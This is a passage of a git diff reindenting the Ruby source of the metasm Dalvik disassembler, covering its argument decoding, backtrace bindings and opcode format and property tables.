@endianness) - Expression[val.last << 16] - when :i16_64hi - val << edata.decode_imm(:i16, @endianness) - Expression[val.last << 48] - when :i32 - val << edata.decode_imm(:u16, @endianness) - val << edata.decode_imm(:i16, @endianness) - Expression[val[-2] | (val[-1] << 16)] - when :u32 - val << edata.decode_imm(:u16, @endianness) - val << edata.decode_imm(:u16, @endianness) - Expression[val[-2] | (val[-1] << 16)] - when :u64 - val << edata.decode_imm(:u16, @endianness) - val << edata.decode_imm(:u16, @endianness) - val << edata.decode_imm(:u16, @endianness) - val << edata.decode_imm(:u16, @endianness) - Expression[val[-4] | (val[-3] << 16) | (val[-2] << 32) | (val[-1] << 48)] - when :ra - Reg.new((val[0] >> 8) & 0xf) - when :rb - Reg.new((val[0] >> 12) & 0xf) - when :ib - Expression[Expression.make_signed((val[0] >> 12) & 0xf, 4)] - when :raa - Reg.new((val[0] >> 8) & 0xff) - when :iaa - Expression[Expression.make_signed((val[0] >> 8) & 0xff, 8)] - when :rbb - val[1] ||= edata.decode_imm(:u16, @endianness) - Reg.new(val[1] & 0xff) - when :ibb - val[1] ||= edata.decode_imm(:u16, @endianness) - Expression[Expression.make_signed(val[1] & 0xff, 8)] - when :rcc - val[1] ||= edata.decode_imm(:u16, @endianness) - Reg.new((val[1] >> 8) & 0xff) - when :icc - val[1] ||= edata.decode_imm(:u16, @endianness) - Expression[Expression.make_signed((val[1] >> 8) & 0xff, 8)] - when :rlist4, :rlist5 - cnt = (val[0] >> 12) & 0xf - val << edata.decode_imm(:u16, @endianness) - [cnt, 4].min.times { - di.instruction.args << Reg.new(val[-1] & 0xf) - val[-1] >>= 4 - } - di.instruction.args << Reg.new((val[0] >> 8) & 0xf) if cnt > 4 - next - when :rlist16 - cnt = (val[0] >> 8) & 0xff - val << edata.decode_imm(:u16, @endianness) - cnt.times { |c| - di.instruction.args << Reg.new(val[-1] + c) - } - next - when :m16 - val << edata.decode_imm(:u16, @endianness) - Method.new(@dex, val.last) - else raise SyntaxError, "Internal error: invalid argument #{a} in #{op.name}" - end - } + op.args.each { |a| + di.instruction.args << case a + when :i16 + val << edata.decode_imm(:i16, @endianness) + Expression[val.last] + when :u16 + val << edata.decode_imm(:u16, @endianness) + Expression[val.last] + when :r16 + val << edata.decode_imm(:u16, @endianness) + Reg.new(val.last) + when :i16_32hi + val << edata.decode_imm(:i16, @endianness) + Expression[val.last << 16] + when :i16_64hi + val << edata.decode_imm(:i16, @endianness) + Expression[val.last << 48] + when :i32 + val << edata.decode_imm(:u16, @endianness) + val << edata.decode_imm(:i16, @endianness) + Expression[val[-2] | (val[-1] << 16)] + when :u32 + val << edata.decode_imm(:u16, @endianness) + val << edata.decode_imm(:u16, @endianness) + Expression[val[-2] | (val[-1] << 16)] + when :u64 + val << edata.decode_imm(:u16, @endianness) + val << edata.decode_imm(:u16, @endianness) + val << edata.decode_imm(:u16, @endianness) + val << edata.decode_imm(:u16, @endianness) + Expression[val[-4] | (val[-3] << 16) | (val[-2] << 32) | (val[-1] << 48)] + when :ra + Reg.new((val[0] >> 8) & 0xf) + when :rb + Reg.new((val[0] >> 12) & 0xf) + when :ib + Expression[Expression.make_signed((val[0] >> 12) & 0xf, 4)] + when :raa + Reg.new((val[0] >> 8) & 0xff) + when :iaa + Expression[Expression.make_signed((val[0] >> 8) & 0xff, 8)] + when :rbb + val[1] ||= edata.decode_imm(:u16, @endianness) + Reg.new(val[1] & 0xff) + when :ibb + val[1] ||= edata.decode_imm(:u16, @endianness) + Expression[Expression.make_signed(val[1] & 0xff, 8)] + when :rcc + val[1] ||= edata.decode_imm(:u16, @endianness) + Reg.new((val[1] >> 8) & 0xff) + when :icc + val[1] ||= edata.decode_imm(:u16, @endianness) + Expression[Expression.make_signed((val[1] >> 8) & 0xff, 8)] + when :rlist4, :rlist5 + cnt = (val[0] >> 12) & 0xf + val << edata.decode_imm(:u16, @endianness) + [cnt, 4].min.times { + di.instruction.args << Reg.new(val[-1] & 0xf) + val[-1] >>= 4 + } + di.instruction.args << Reg.new((val[0] >> 8) & 0xf) if cnt > 4 + next + when :rlist16 + cnt = (val[0] >> 8) & 0xff + val << edata.decode_imm(:u16, @endianness) + cnt.times { |c| + di.instruction.args << Reg.new(val[-1] + c) + } + next + when :m16 + val << edata.decode_imm(:u16, @endianness) + Method.new(@dex, val.last) + else raise SyntaxError, "Internal error: invalid argument #{a} in #{op.name}" + end + } - di.bin_length = val.length*2 + di.bin_length = val.length*2 - di - end + di + end - def backtrace_binding - @backtrace_binding ||= init_backtrace_binding - end + def backtrace_binding + @backtrace_binding ||= init_backtrace_binding + end - def init_backtrace_binding - @backtrace_binding ||= {} - sz = @size/8 - @opcode_list.each { |op| - case op.name - when /invoke/ - @backtrace_binding[op.name] = lambda { |di, *args| { - :callstack => Expression[:callstack, :-, sz], - Indirection[:callstack, sz] => Expression[di.next_addr] - } } - when /return/ - @backtrace_binding[op.name] = lambda { |di, *args| { - :callstack => Expression[:callstack, :+, sz] - } } - end - } - @backtrace_binding - end + def init_backtrace_binding + @backtrace_binding ||= {} + sz = @size/8 + @opcode_list.each { |op| + case op.name + when /invoke/ + @backtrace_binding[op.name] = lambda { |di, *args| { + :callstack => Expression[:callstack, :-, sz], + Indirection[:callstack, sz] => Expression[di.next_addr] + } } + when /return/ + @backtrace_binding[op.name] = lambda { |di, *args| { + :callstack => Expression[:callstack, :+, sz] + } } + end + } + @backtrace_binding + end - def get_backtrace_binding(di) - a = di.instruction.args.map { |arg| - case arg - when Reg; arg.symbolic - else arg - end - } - - if binding = backtrace_binding[di.opcode.name] - bd = binding[di, *a] - else - puts "unhandled instruction to backtrace: #{di}" if $VERBOSE - # assume nothing except the 1st arg is modified - case a[0] - when Indirection, Symbol; { a[0] => Expression::Unknown } - when Expression; (x = a[0].externals.first) ? { x => Expression::Unknown } : {} - else {} - end.update(:incomplete_binding => Expression[1]) - end + def get_backtrace_binding(di) + a = di.instruction.args.map { |arg| + case arg + when Reg; arg.symbolic + else arg + end + } + + if binding = backtrace_binding[di.opcode.name] + bd = binding[di, *a] + else + puts "unhandled instruction to backtrace: #{di}" if $VERBOSE + # assume nothing except the 1st arg is modified + case a[0] + when Indirection, Symbol; { a[0] => Expression::Unknown } + when Expression; (x = a[0].externals.first) ? { x => Expression::Unknown } : {} + else {} + end.update(:incomplete_binding => Expression[1]) + end - end - - def get_xrefs_x(dasm, di) - if di.opcode.props[:saveip] - m = di.instruction.args.first - if m.kind_of? Method and m.off - [m.off] - else - [:default] - end - elsif di.opcode.props[:setip] - if di.opcode.name =~ /return/ - [Indirection[:callstack, @size/8]] - else - [] # [di.instruction.args.last] - end - else - [] - end - end + end + + def get_xrefs_x(dasm, di) + if di.opcode.props[:saveip] + m = di.instruction.args.first + if m.kind_of? Method and m.off + [m.off] + else + [:default] + end + elsif di.opcode.props[:setip] + if di.opcode.name =~ /return/ + [Indirection[:callstack, @size/8]] + else + [] # [di.instruction.args.last] + end + else + [] + end + end - # returns a DecodedFunction suitable for :default - # uses disassembler_default_bt{for/bind}_callback - def disassembler_default_func - df = DecodedFunction.new - ra = Indirection[:callstack, @size/8] - df.backtracked_for << BacktraceTrace.new(ra, :default, ra, :x, nil) - df.backtrace_binding[:callstack] = Expression[:callstack, :+, @size/8] - df.btfor_callback = lambda { |dasm, btfor, funcaddr, calladdr| - if funcaddr != :default - btfor - elsif di = dasm.decoded[calladdr] and di.opcode.props[:saveip] - btfor - else [] - end - } + # returns a DecodedFunction suitable for :default + # uses disassembler_default_bt{for/bind}_callback + def disassembler_default_func + df = DecodedFunction.new + ra = Indirection[:callstack, @size/8] + df.backtracked_for << BacktraceTrace.new(ra, :default, ra, :x, nil) + df.backtrace_binding[:callstack] = Expression[:callstack, :+, @size/8] + df.btfor_callback = lambda { |dasm, btfor, funcaddr, calladdr| + if funcaddr != :default + btfor + elsif di = dasm.decoded[calladdr] and di.opcode.props[:saveip] + btfor + else [] + end + } - df - end + df + end - def backtrace_is_function_return(expr, di=nil) - expr and Expression[expr] == Expression[Indirection[:callstack, @size/8]] - end + def backtrace_is_function_return(expr, di=nil) + expr and Expression[expr] == Expression[Indirection[:callstack, @size/8]] + end end end diff --git a/lib/metasm/metasm/dalvik/main.rb b/lib/metasm/metasm/dalvik/main.rb index aee229bd3c769..b0a0884ffc00b 100644 --- a/lib/metasm/metasm/dalvik/main.rb +++ b/lib/metasm/metasm/dalvik/main.rb @@ -8,53 +8,53 @@ module Metasm class Dalvik < CPU - class Reg - attr_accessor :i - def initialize(i) - @i = i - end - - def symbolic - "r#@i".to_sym - end - - def to_s - "r#@i" - end - end - - class Method - attr_accessor :dex, :midx, :off - def initialize(dex, midx) - @dex = dex - @midx = midx - if @dex and m = @dex.methods[midx] and c = @dex.classes[m.classidx] and c.data and - me = (c.data.direct_methods+c.data.virtual_methods).find { |mm| mm.method == m } - @off = me.codeoff + me.code.insns_off - end - end - - def to_s - if @dex and m = @dex.methods[@midx] - @dex.types[m.classidx] + '->' + @dex.strings[m.nameidx] - #dex.encoded.inv_export[@off] - else - "method_#@midx" - end - end - end - - def initialize(*args) - super() - @size = args.grep(Integer).first || 32 - @dex = args.grep(ExeFormat).first - @endianness = args.delete(:little) || args.delete(:big) || (@dex ? @dex.endianness : :little) - end - - def init_opcode_list - init_latest - @opcode_list - end + class Reg + attr_accessor :i + def initialize(i) + @i = i + end + + def symbolic + "r#@i".to_sym + end + + def to_s + "r#@i" + end + end + + class Method + attr_accessor :dex, :midx, :off + def initialize(dex, midx) + @dex = dex + @midx = midx + if @dex and m = @dex.methods[midx] and c = @dex.classes[m.classidx] and c.data and + me = (c.data.direct_methods+c.data.virtual_methods).find { |mm| mm.method == m } + @off = me.codeoff + me.code.insns_off + end + end + + def to_s + if @dex and m = @dex.methods[@midx] + @dex.types[m.classidx] + '->' + @dex.strings[m.nameidx] + #dex.encoded.inv_export[@off] + else + "method_#@midx" + end + end + end + + def initialize(*args) + super() + @size = args.grep(Integer).first || 32 + @dex = args.grep(ExeFormat).first + @endianness = args.delete(:little) || args.delete(:big) || (@dex ? @dex.endianness : :little) + end + + def init_opcode_list + init_latest + @opcode_list + end end end diff --git a/lib/metasm/metasm/dalvik/opcodes.rb b/lib/metasm/metasm/dalvik/opcodes.rb index de6f23cb770f1..48b858eec4fda 100644 --- a/lib/metasm/metasm/dalvik/opcodes.rb +++ b/lib/metasm/metasm/dalvik/opcodes.rb @@ -15,7 +15,7 @@ module Metasm class Dalvik - OPCODES = %w[nop move move_from16 move_16 move_wide move_wide_from16 + OPCODES = %w[nop move move_from16 move_16 move_wide move_wide_from16 move_wide_16 move_object move_object_from16 move_object_16 move_result move_result_wide move_result_object move_exception return_void return return_wide return_object @@ -60,307 +60,307 @@ class Dalvik invoke_virtual_quick invoke_virtual_quick_range invoke_super_quick invoke_super_quick_range unused_fc unused_fd unused_fe unused_ff] - def init_dalvik - @valid_props << :canthrow - @valid_args = [:i16, :i16_32hi, :i16_64hi, :i32, :iaa, :ib, :icc, :u16, :u32, :u64, - :r16, :ra, :raa, :rb, :rbb, :rcc, :rlist16, :rlist4, :rlist5, :m16] - @opcode_list = [] + def init_dalvik + @valid_props << :canthrow + @valid_args = [:i16, :i16_32hi, :i16_64hi, :i32, :iaa, :ib, :icc, :u16, :u32, :u64, + :r16, :ra, :raa, :rb, :rbb, :rcc, :rlist16, :rlist4, :rlist5, :m16] + @opcode_list = [] - OPCODES.each_with_index { |n, b| - op = Opcode.new(n, b) - addop_args(op) - addop_props(op) - @opcode_list << op - } + OPCODES.each_with_index { |n, b| + op = Opcode.new(n, b) + addop_args(op) + addop_props(op) + @opcode_list << op + } - raise "Internal error #{@opcode_list.length}" if @opcode_list.length != 256 - end - alias init_latest init_dalvik + raise "Internal error #{@opcode_list.length}" if @opcode_list.length != 256 + end + alias init_latest init_dalvik - def addop_args(op) - fmt = case op.name - when 'goto' + def addop_args(op) + fmt = case op.name + when 'goto' :fmt10t - when 'nop', 'return_void' - :fmt10x - when 'const_4' - :fmt11n - when 'const_high16' - :fmt21h - when 'const_wide_high16' - :fmt21hh - when 'move_result', 'move_result_wide', 'move_result_object', - 'move_exception', 'return', 'return_wide', - 'return_object', 'monitor_enter', 'monitor_exit', - 'throw' - :fmt11x - when 'move', 'move_wide', 'move_object', 'array_length', - 'neg_int', 'not_int', 'neg_long', 'not_long', - 'neg_float', 'neg_double', 'int_to_long', - 'int_to_float', 'int_to_double', 'long_to_int', - 'long_to_float', 'long_to_double', 'float_to_int', - 'float_to_long', 'float_to_double', 'double_to_int', - 'double_to_long', 'double_to_float', 'int_to_byte', - 'int_to_char', 'int_to_short', 'add_int_2addr', - 'sub_int_2addr', 'mul_int_2addr', 'div_int_2addr', - 'rem_int_2addr', 'and_int_2addr', 'or_int_2addr', - 'xor_int_2addr', 'shl_int_2addr', 'shr_int_2addr', - 'ushr_int_2addr', 'add_long_2addr', 'sub_long_2addr', - 'mul_long_2addr', 'div_long_2addr', 'rem_long_2addr', - 'and_long_2addr', 'or_long_2addr', 'xor_long_2addr', - 'shl_long_2addr', 'shr_long_2addr', 'ushr_long_2addr', - 'add_float_2addr', 'sub_float_2addr', 'mul_float_2addr', - 'div_float_2addr', 'rem_float_2addr', - 'add_double_2addr', 'sub_double_2addr', - 'mul_double_2addr', 'div_double_2addr', - 'rem_double_2addr' - :fmt12x - when 'goto_16' - :fmt20t - when 'goto_32' - :fmt30t - when 'const_string', 'const_class', 'check_cast', - 'new_instance', 'sget', 'sget_wide', 'sget_object', - 'sget_boolean', 'sget_byte', 'sget_char', 'sget_short', - 'sput', 'sput_wide', 'sput_object', 'sput_boolean', - 'sput_byte', 'sput_char', 'sput_short' - :fmt21c - when 'const_16', 'const_wide_16' - :fmt21s - when 'if_eqz', 'if_nez', 'if_ltz', 'if_gez', 'if_gtz', 'if_lez' - :fmt21t - when 'fill_array_data', 'packed_switch', 'sparse_switch' - :fmt31t - when 'add_int_lit8', 'rsub_int_lit8', 'mul_int_lit8', - 'div_int_lit8', 'rem_int_lit8', 'and_int_lit8', - 'or_int_lit8', 'xor_int_lit8', 'shl_int_lit8', - 'shr_int_lit8', 'ushr_int_lit8' - :fmt22b - when 'instance_of', 'new_array', 'iget', 'iget_wide', - 'iget_object', 'iget_boolean', 'iget_byte', - 'iget_char', 'iget_short', 'iput', 'iput_wide', - 'iput_object', 'iput_boolean', 'iput_byte', - 'iput_char', 'iput_short' - :fmt22c - when 'add_int_lit16', 'rsub_int', 'mul_int_lit16', - 'div_int_lit16', 'rem_int_lit16', 'and_int_lit16', - 'or_int_lit16', 'xor_int_lit16' - :fmt22s - when 'if_eq', 'if_ne', 'if_lt', 'if_ge', 'if_gt', 'if_le' - :fmt22t - when 'move_from16', 'move_wide_from16', 'move_object_from16' - :fmt22x - when 'cmpl_float', 'cmpg_float', 'cmpl_double', 'cmpg_double', - 'cmp_long', 'aget', 'aget_wide', 'aget_object', - 'aget_boolean', 'aget_byte', 'aget_char', 'aget_short', - 'aput', 'aput_wide', 'aput_object', 'aput_boolean', - 'aput_byte', 'aput_char', 'aput_short', 'add_int', - 'sub_int', 'mul_int', 'div_int', 'rem_int', 'and_int', - 'or_int', 'xor_int', 'shl_int', 'shr_int', 'ushr_int', - 'add_long', 'sub_long', 'mul_long', 'div_long', - 'rem_long', 'and_long', 'or_long', 'xor_long', - 'shl_long', 'shr_long', 'ushr_long', 'add_float', - 'sub_float', 'mul_float', 'div_float', 'rem_float', - 'add_double', 'sub_double', 'mul_double', 'div_double', - 'rem_double' - :fmt23x - when 'const', 'const_wide_32' - :fmt31i - when 'const_string_jumbo' - :fmt31c - when 'move_16', 'move_wide_16', 'move_object_16' - :fmt32x - when 'filled_new_array' - :fmt35ca - when 'invoke_virtual', 'invoke_super', - 'invoke_direct', 'invoke_static', 'invoke_interface' - :fmt35c - when 'filled_new_array_range', 'invoke_virtual_range', - 'invoke_super_range', 'invoke_direct_range', - 'invoke_static_range', 'invoke_interface_range' - :fmt3rc - when 'const_wide' - :fmt51l - when 'throw_verification_error' - :fmt20bc - when 'iget_quick', 'iget_wide_quick', 'iget_object_quick', - 'iput_quick', 'iput_wide_quick', 'iput_object_quick' - :fmt22cs - when 'invoke_virtual_quick', 'invoke_super_quick' - :fmt35ms - when 'invoke_virtual_quick_range', 'invoke_super_quick_range' - :fmt3rms - when 'execute_inline' - :fmt3inline - when 'invoke_direct_empty' - :fmt35c - when 'unused_3e', 'unused_3f', 'unused_40', 'unused_41', - 'unused_42', 'unused_43', 'unused_73', 'unused_79', - 'unused_7a', 'unused_e3', 'unused_e4', 'unused_e5', - 'unused_e6', 'unused_e7', 'unused_e8', 'unused_e9', - 'unused_ea', 'unused_eb', 'unused_ec', 'unused_ef', - 'unused_f1', 'unused_fc', 'unused_fd', 'unused_fe', - 'unused_ff' - :fmtUnknown - else - raise "Internal error #{op.name}" - end + when 'nop', 'return_void' + :fmt10x + when 'const_4' + :fmt11n + when 'const_high16' + :fmt21h + when 'const_wide_high16' + :fmt21hh + when 'move_result', 'move_result_wide', 'move_result_object', + 'move_exception', 'return', 'return_wide', + 'return_object', 'monitor_enter', 'monitor_exit', + 'throw' + :fmt11x + when 'move', 'move_wide', 'move_object', 'array_length', + 'neg_int', 'not_int', 'neg_long', 'not_long', + 'neg_float', 'neg_double', 'int_to_long', + 'int_to_float', 'int_to_double', 'long_to_int', + 'long_to_float', 'long_to_double', 'float_to_int', + 'float_to_long', 'float_to_double', 'double_to_int', + 'double_to_long', 'double_to_float', 'int_to_byte', + 'int_to_char', 'int_to_short', 'add_int_2addr', + 'sub_int_2addr', 'mul_int_2addr', 'div_int_2addr', + 'rem_int_2addr', 'and_int_2addr', 'or_int_2addr', + 'xor_int_2addr', 'shl_int_2addr', 'shr_int_2addr', + 'ushr_int_2addr', 'add_long_2addr', 'sub_long_2addr', + 'mul_long_2addr', 'div_long_2addr', 'rem_long_2addr', + 'and_long_2addr', 'or_long_2addr', 'xor_long_2addr', + 'shl_long_2addr', 'shr_long_2addr', 'ushr_long_2addr', + 'add_float_2addr', 'sub_float_2addr', 'mul_float_2addr', + 'div_float_2addr', 'rem_float_2addr', + 'add_double_2addr', 'sub_double_2addr', + 'mul_double_2addr', 'div_double_2addr', + 'rem_double_2addr' + :fmt12x + when 'goto_16' + :fmt20t + when 'goto_32' + :fmt30t + when 'const_string', 'const_class', 'check_cast', + 'new_instance', 'sget', 'sget_wide', 'sget_object', + 'sget_boolean', 'sget_byte', 'sget_char', 'sget_short', + 'sput', 'sput_wide', 'sput_object', 'sput_boolean', + 'sput_byte', 'sput_char', 'sput_short' + :fmt21c + when 'const_16', 'const_wide_16' + :fmt21s + when 'if_eqz', 'if_nez', 'if_ltz', 'if_gez', 'if_gtz', 'if_lez' + :fmt21t + when 'fill_array_data', 'packed_switch', 'sparse_switch' + :fmt31t + when 'add_int_lit8', 'rsub_int_lit8', 'mul_int_lit8', + 'div_int_lit8', 'rem_int_lit8', 'and_int_lit8', + 'or_int_lit8', 'xor_int_lit8', 'shl_int_lit8', + 'shr_int_lit8', 'ushr_int_lit8' + :fmt22b + when 'instance_of', 'new_array', 'iget', 'iget_wide', + 'iget_object', 'iget_boolean', 'iget_byte', + 'iget_char', 'iget_short', 'iput', 'iput_wide', + 'iput_object', 'iput_boolean', 'iput_byte', + 'iput_char', 'iput_short' + :fmt22c + when 'add_int_lit16', 'rsub_int', 'mul_int_lit16', + 'div_int_lit16', 'rem_int_lit16', 'and_int_lit16', + 'or_int_lit16', 'xor_int_lit16' + :fmt22s + when 'if_eq', 'if_ne', 'if_lt', 'if_ge', 'if_gt', 'if_le' + :fmt22t + when 'move_from16', 'move_wide_from16', 'move_object_from16' + :fmt22x + when 'cmpl_float', 'cmpg_float', 'cmpl_double', 'cmpg_double', + 'cmp_long', 'aget', 'aget_wide', 'aget_object', + 'aget_boolean', 'aget_byte', 'aget_char', 'aget_short', + 'aput', 'aput_wide', 'aput_object', 'aput_boolean', + 'aput_byte', 'aput_char', 'aput_short', 'add_int', + 'sub_int', 'mul_int', 'div_int', 'rem_int', 'and_int', + 'or_int', 'xor_int', 'shl_int', 'shr_int', 'ushr_int', + 'add_long', 'sub_long', 'mul_long', 'div_long', + 'rem_long', 'and_long', 'or_long', 'xor_long', + 'shl_long', 'shr_long', 'ushr_long', 'add_float', + 'sub_float', 'mul_float', 'div_float', 'rem_float', + 'add_double', 'sub_double', 'mul_double', 'div_double', + 'rem_double' + :fmt23x + when 'const', 'const_wide_32' + :fmt31i + when 'const_string_jumbo' + :fmt31c + when 'move_16', 'move_wide_16', 'move_object_16' + :fmt32x + when 'filled_new_array' + :fmt35ca + when 'invoke_virtual', 'invoke_super', + 'invoke_direct', 'invoke_static', 'invoke_interface' + :fmt35c + when 'filled_new_array_range', 'invoke_virtual_range', + 'invoke_super_range', 'invoke_direct_range', + 'invoke_static_range', 'invoke_interface_range' + :fmt3rc + when 'const_wide' + :fmt51l + when 'throw_verification_error' + :fmt20bc + when 'iget_quick', 'iget_wide_quick', 'iget_object_quick', + 'iput_quick', 'iput_wide_quick', 'iput_object_quick' + :fmt22cs + when 'invoke_virtual_quick', 'invoke_super_quick' + :fmt35ms + when 'invoke_virtual_quick_range', 'invoke_super_quick_range' + :fmt3rms + when 'execute_inline' + :fmt3inline + when 'invoke_direct_empty' + :fmt35c + when 'unused_3e', 'unused_3f', 'unused_40', 'unused_41', + 'unused_42', 'unused_43', 'unused_73', 'unused_79', + 'unused_7a', 'unused_e3', 'unused_e4', 'unused_e5', + 'unused_e6', 'unused_e7', 'unused_e8', 'unused_e9', + 'unused_ea', 'unused_eb', 'unused_ec', 'unused_ef', + 'unused_f1', 'unused_fc', 'unused_fd', 'unused_fe', + 'unused_ff' + :fmtUnknown + else + raise "Internal error #{op.name}" + end - case fmt - when :fmt10x; op.args << :iaa - when :fmt12x; op.args << :ra << :rb - when :fmt11n; op.args << :ra << :ib - when :fmt11x; op.args << :raa - when :fmt10t; op.args << :iaa - when :fmt20t; op.args << :i16 - when :fmt20bc; op.args << :iaa << :u16 - when :fmt21c; op.args << :raa << :u16 - when :fmt22x; op.args << :raa << :r16 - when :fmt21s, :fmt21t; op.args << :raa << :i16 - when :fmt21h; op.args << :raa << :i16_32hi - when :fmt21hh; op.args << :raa << :i16_64hi - when :fmt23x; op.args << :raa << :rbb << :rcc - when :fmt22b; op.args << :raa << :rbb << :icc - when :fmt22s, :fmt22t; op.args << :ra << :rb << :i16 - when :fmt22c, :fmt22cs; op.args << :ra << :rb << :u16 - when :fmt30t; op.args << :i32 - when :fmt31t, :fmt31c; op.args << :raa << :u32 - when :fmt32x; op.args << :r16 << :r16 - when :fmt31i; op.args << :raa << :i32 - when :fmt35ca - op.args << :r16 << :rlist5 - when :fmt35c, :fmt35ms - # rlist: - # nr of regs in :ib (max 5) - # regs: :ib.times { reg :i16 & 0xf ; :i16 >>= 4 } - # reg :ra if :ib == 5 - op.args << :m16 << :rlist5 - when :fmt3inline - op.args << :r16 << :rlist4 - when :fmt3rc, :fmt3rms - # rlist = :r16, :r16+1, :r16+2, ..., :r16+:iaa-1 - op.args << :r16 << :rlist16 - when :fmt51l - # u64 = u16 | (u16 << 16) | ... - op.args << :raa << :u64 - when :fmtUnknown - op.args << :iaa - else - raise "Internal error #{fmt.inspect}" - end - end + case fmt + when :fmt10x; op.args << :iaa + when :fmt12x; op.args << :ra << :rb + when :fmt11n; op.args << :ra << :ib + when :fmt11x; op.args << :raa + when :fmt10t; op.args << :iaa + when :fmt20t; op.args << :i16 + when :fmt20bc; op.args << :iaa << :u16 + when :fmt21c; op.args << :raa << :u16 + when :fmt22x; op.args << :raa << :r16 + when :fmt21s, :fmt21t; op.args << :raa << :i16 + when :fmt21h; op.args << :raa << :i16_32hi + when :fmt21hh; op.args << :raa << :i16_64hi + when :fmt23x; op.args << :raa << :rbb << :rcc + when :fmt22b; op.args << :raa << :rbb << :icc + when :fmt22s, :fmt22t; op.args << :ra << :rb << :i16 + when :fmt22c, :fmt22cs; op.args << :ra << :rb << :u16 + when :fmt30t; op.args << :i32 + when :fmt31t, :fmt31c; op.args << :raa << :u32 + when :fmt32x; op.args << :r16 << :r16 + when :fmt31i; op.args << :raa << :i32 + when :fmt35ca + op.args << :r16 << :rlist5 + when :fmt35c, :fmt35ms + # rlist: + # nr of regs in :ib (max 5) + # regs: :ib.times { reg :i16 & 0xf ; :i16 >>= 4 } + # reg :ra if :ib == 5 + op.args << :m16 << :rlist5 + when :fmt3inline + op.args << :r16 << :rlist4 + when :fmt3rc, :fmt3rms + # rlist = :r16, :r16+1, :r16+2, ..., :r16+:iaa-1 + op.args << :r16 << :rlist16 + when :fmt51l + # u64 = u16 | (u16 << 16) | ... + op.args << :raa << :u64 + when :fmtUnknown + op.args << :iaa + else + raise "Internal error #{fmt.inspect}" + end + end - def addop_props(op) - case op.name - when 'nop', 'move', 'move_from16', 'move_16', 'move_wide', - 'move_wide_from16', 'move_wide_16', 'move_object', - 'move_object_from16', 'move_object_16', 'move_result', - 'move_result_wide', 'move_result_object', - 'move_exception', 'const_4', 'const_16', 'const', - 'const_high16', 'const_wide_16', 'const_wide_32', - 'const_wide', 'const_wide_high16', 'fill_array_data', - 'cmpl_float', 'cmpg_float', 'cmpl_double', - 'cmpg_double', 'cmp_long', 'neg_int', 'not_int', - 'neg_long', 'not_long', 'neg_float', 'neg_double', - 'int_to_long', 'int_to_float', 'int_to_double', - 'long_to_int', 'long_to_float', 'long_to_double', - 'float_to_int', 'float_to_long', 'float_to_double', - 'double_to_int', 'double_to_long', 'double_to_float', - 'int_to_byte', 'int_to_char', 'int_to_short', 'add_int', - 'sub_int', 'mul_int', 'and_int', 'or_int', 'xor_int', - 'shl_int', 'shr_int', 'ushr_int', 'add_long', - 'sub_long', 'mul_long', 'and_long', 'or_long', - 'xor_long', 'shl_long', 'shr_long', 'ushr_long', - 'add_float', 'sub_float', 'mul_float', 'div_float', - 'rem_float', 'add_double', 'sub_double', 'mul_double', - 'div_double', 'rem_double', 'add_int_2addr', - 'sub_int_2addr', 'mul_int_2addr', 'and_int_2addr', - 'or_int_2addr', 'xor_int_2addr', 'shl_int_2addr', - 'shr_int_2addr', 'ushr_int_2addr', 'add_long_2addr', - 'sub_long_2addr', 'mul_long_2addr', 'and_long_2addr', - 'or_long_2addr', 'xor_long_2addr', 'shl_long_2addr', - 'shr_long_2addr', 'ushr_long_2addr', 'add_float_2addr', - 'sub_float_2addr', 'mul_float_2addr', 'div_float_2addr', - 'rem_float_2addr', 'add_double_2addr', - 'sub_double_2addr', 'mul_double_2addr', - 'div_double_2addr', 'rem_double_2addr', 'add_int_lit16', - 'rsub_int', 'mul_int_lit16', 'and_int_lit16', - 'or_int_lit16', 'xor_int_lit16', 'add_int_lit8', - 'rsub_int_lit8', 'mul_int_lit8', 'and_int_lit8', - 'or_int_lit8', 'xor_int_lit8', 'shl_int_lit8', - 'shr_int_lit8', 'ushr_int_lit8' - # normal opcode, continues to next, nothing raised - when 'const_string', 'const_string_jumbo', 'const_class', - 'monitor_enter', 'monitor_exit', 'check_cast', - 'instance_of', 'array_length', 'new_instance', - 'new_array', 'filled_new_array', - 'filled_new_array_range', 'aget', 'aget_boolean', - 'aget_byte', 'aget_char', 'aget_short', 'aget_wide', - 'aget_object', 'aput', 'aput_boolean', 'aput_byte', - 'aput_char', 'aput_short', 'aput_wide', 'aput_object', - 'iget', 'iget_boolean', 'iget_byte', 'iget_char', - 'iget_short', 'iget_wide', 'iget_object', 'iput', - 'iput_boolean', 'iput_byte', 'iput_char', 'iput_short', - 'iput_wide', 'iput_object', 'sget', 'sget_boolean', - 'sget_byte', 'sget_char', 'sget_short', 'sget_wide', - 'sget_object', 'sput', 'sput_boolean', 'sput_byte', - 'sput_char', 'sput_short', 'sput_wide', 'sput_object', - 'div_int', 'rem_int', 'div_long', 'rem_long', - 'div_int_2addr', 'rem_int_2addr', 'div_long_2addr', - 'rem_long_2addr', 'div_int_lit16', 'rem_int_lit16', - 'div_int_lit8', 'rem_int_lit8' - op.props[:canthrow] = true - when 'invoke_virtual', 'invoke_virtual_range', 'invoke_super', - 'invoke_super_range', 'invoke_direct', - 'invoke_direct_range', 'invoke_static', - 'invoke_static_range', 'invoke_interface', - 'invoke_interface_range' - op.props[:canthrow] = true - op.props[:saveip] = true - op.props[:setip] = true - op.props[:stopexec] = true - when 'return_void', 'return', 'return_wide', 'return_object' - op.props[:setip] = true - op.props[:stopexec] = true - when 'throw' - op.props[:canthrow] = true - op.props[:stopexec] = true - when 'goto', 'goto_16', 'goto_32' - op.props[:setip] = true - op.props[:stopexec] = true - when 'if_eq', 'if_ne', 'if_lt', 'if_ge', 'if_gt', 'if_le', - 'if_eqz', 'if_nez', 'if_ltz', 'if_gez', 'if_gtz', - 'if_lez' - op.props[:setip] = true - when 'packed_switch', 'sparse_switch' - op.props[:setip] = true # if no table match, nostopexec - op.props[:setip] = true - when 'throw_verification_error' - op.props[:canthrow] = true - op.props[:stopexec] = true - when 'execute_inline' - when 'iget_quick', 'iget_wide_quick', 'iget_object_quick', - 'iput_quick', 'iput_wide_quick', 'iput_object_quick' - op.props[:canthrow] = true - when 'invoke_virtual_quick', 'invoke_virtual_quick_range', - 'invoke_super_quick', 'invoke_super_quick_range', - 'invoke_direct_empty' - op.props[:canthrow] = true - op.props[:saveip] = true - op.props[:setip] = true - op.props[:stopexec] = true - when 'unused_3e', 'unused_3f', 'unused_40', 'unused_41', - 'unused_42', 'unused_43', 'unused_73', 'unused_79', - 'unused_7a', 'unused_e3', 'unused_e4', 'unused_e5', - 'unused_e6', 'unused_e7', 'unused_e8', 'unused_e9', - 'unused_ea', 'unused_eb', 'unused_ec', 'unused_ef', - 'unused_f1', 'unused_fc', 